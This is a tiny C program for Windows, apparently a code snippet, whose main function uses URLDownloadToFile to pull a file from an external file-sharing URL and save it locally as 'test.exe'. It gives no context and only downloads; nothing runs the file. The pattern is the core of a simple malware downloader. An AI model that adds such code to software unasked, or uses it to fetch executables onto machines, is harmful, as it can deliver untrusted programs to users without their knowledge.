int main() { TCHAR url[] = "http://rghost.ru/7Y89jVzLJ"; TCHAR name[] = "test.exe"; HRESULT res = URLDownloadToFile(NULL, url, name, 0, NULL); return 0; }